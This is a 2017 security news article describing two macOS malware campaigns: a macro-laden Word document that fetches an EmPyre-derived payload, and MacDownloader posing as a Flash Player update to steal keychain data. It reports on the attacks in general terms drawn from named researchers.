2 Malware Attacks Target Macs

Friday, February 10, 2017 @ 01:02 PM gHale

There are two separate instances of MacOS malware this week, where one exploit relies on an old Windows technique and the other focuses on a phony Flash update, researchers said.

In the first case, a malicious Microsoft Word abusing macros, entitled “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace,” ended up sent out.

Mac Malware Linked to Iran
Hacker Hijacks Printers
Ukraine Attack: An Insider’s Perspective
Transformer Shooting Knocks Out Substation

When Mac users opened the document in a Word application configured to allow macros and ignore warnings, the embedded macro automatically checked the LittleSnitch security firewall wasn’t running, said Patrick Wardle, director of security firm Synack.

It then downloads an encrypted payload, decrypts it using a hard-coded key and executes the payload. It seems the code in the macro ended up taken from an open-source exploit framework for Macs named EmPyre. By the time researchers found the document, the site the payload ended up downloaded from was no longer serving it, so it’s impossible to tell exactly what it was doing.

Given the fact the code was so similar to EmPyre, the malware could monitor webcams, steal password and encryption keys and access browser history logs, the researcher said.

The other malware instance discovered this week also relied on classic Windows tactics by faking a regular software update dialog that downloads malicious code rather than the app’s needed update. The MacDownloader virus presented itself as an Adobe Flash Player update, which everyone knows are annoying. This is what attackers were counting on, of course, as people either dismiss the updates or just press yes to get them dismissed once and for all.

What happened when users clicked on the update was the malware could then cull the user keychain, search for usernames and passwords, or collect private, sensitive data.

This vulnerability relied on people clicking on a link to update Flash Player from a website and running the downloaded file.

The malware ended up discovered and analyzed by Claudio Guarnieri and Collin Anderson.

MacDownloader, disguised by attackers as a Flash Player update and a Bitdefender adware removal tool, ended up created at the tail end of last year.

Leave a Reply

You must be logged in to post a comment.